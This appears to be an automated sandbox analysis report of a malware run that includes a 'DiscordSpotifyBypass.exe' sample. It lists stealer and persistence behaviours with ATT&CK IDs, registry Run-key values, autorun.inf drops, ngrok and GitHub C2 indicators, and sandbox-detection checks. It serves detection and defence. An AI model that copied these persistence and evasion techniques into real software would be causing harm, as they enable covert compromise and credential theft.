6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe
6456	DiscordSpotifyBypass.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x000800000002c941-16604.dat	vmprotect

Adds Run key to start application 2 TTPs 16 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5Swt0w3tF0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\5Swt0w3tF0.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Client.exe\""	Client.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\65449e22560e51e0740c2a10dc6c9c59 = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\l7Npnlscrd = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\l7Npnlscrd.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5Swt0w3tF0 = "\"C:\\Recovery\\WindowsRE\\5Swt0w3tF0.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\Downloads\\conhost.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\5Swt0w3tF0 = "\"C:\\Recovery\\WindowsRE\\5Swt0w3tF0.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	4363463463464363463463463.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\Downloads\\conhost.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\l7Npnlscrd = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\l7Npnlscrd.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\5Swt0w3tF0 = "\"C:\\Users\\Admin\\AppData\\Roaming\\5Swt0w3tF0.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\65449e22560e51e0740c2a10dc6c9c59 = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\" .."	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\""	5Swt0w3tF0.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Recovery\\WindowsRE\\OfficeClickToRun.exe\""	5Swt0w3tF0.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
7	raw.githubusercontent.com
169	raw.githubusercontent.com
173	2.tcp.ngrok.io
196	2.tcp.ngrok.io
339	2.tcp.ngrok.io
6	raw.githubusercontent.com
240	2.tcp.ngrok.io
313	2.tcp.ngrok.io
416	2.tcp.ngrok.io
523	raw.githubusercontent.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com
71	ip-api.com
141	ip-api.com
240	ip-api.com
339	ip-api.com
416	ip-api.com

Drops autorun.inf file 1 TTPs 7 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	svchost.exe
File created	D:\autorun.inf	svchost.exe
File created	F:\autorun.inf	svchost.exe
File created	C:\autorun.inf	server.exe
File opened for modification	C:\autorun.inf	server.exe
File created	F:\autorun.inf	server.exe
File opened for modification	F:\autorun.inf	server.exe

Drops file in System32 directory 52 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File created	\??\c:\Windows\System32\CSC228A886F73A744D185B3D3C6748658D.TMP	csc.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File created	\??\c:\Windows\System32\pf6bhg.exe	csc.exe
File created	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Dock.exe	server.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1448 set thread context of 3828	1448	javaw.exe	86
PID 1448 set thread context of 576	1448	javaw.exe	90
PID 4860 set thread context of 4304	4860	crypted_c360a5b7.exe	101

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001b00000002aacc-395.dat	upx
behavioral1/memory/2108-401-0x0000000000400000-0x000000000041A000-memory.dmp	upx
behavioral1/memory/2108-431-0x0000000000400000-0x000000000041A000-memory.dmp	upx

Drops file in Program Files directory 53 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File created	C:\Program Files (x86)\Windows Defender\es-ES\l7Npnlscrd.exe	5Swt0w3tF0.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File created	C:\Program Files (x86)\Windows Defender\es-ES\d5579d32ba3cd2	5Swt0w3tF0.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File created	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\l7Npnlscrd.exe	5Swt0w3tF0.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe
File opened for modification	C:\Program Files (x86)\Dock.exe	server.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001a00000002af49-12691.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3740	1448	WerFault.exe	85

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	newest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	billi_e58d74e455634dc695ed8a7b8b320325.exe.upx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vovdawdrg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 42 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6748	PING.EXE
3280	PING.EXE
1244	PING.EXE
2816	PING.EXE
2036	PING.EXE
6416	PING.EXE
6276	PING.EXE
6824	PING.EXE
2300	PING.EXE
7004	PING.EXE
5460	PING.EXE
3728	PING.EXE
6052	PING.EXE
1820	PING.EXE
2816	PING.EXE
3888	PING.EXE
2328	PING.EXE
6992	PING.EXE
2800	PING.EXE
4628	PING.EXE
696	PING.EXE
4636	PING.EXE
3912	PING.EXE
6136	PING.EXE
4100	PING.EXE
4652	PING.EXE
4736	PING.EXE
1164	PING.EXE
5552	PING.EXE
7028	PING.EXE
440	PING.EXE
5276	PING.EXE
6340	PING.EXE
2692	PING.EXE
2756	PING.EXE
6652	PING.EXE
1444	PING.EXE
3416	PING.EXE
3416	PING.EXE
5944	PING.EXE
3268	PING.EXE
5052	PING.EXE

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Taskmgr.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
6288	timeout.exe

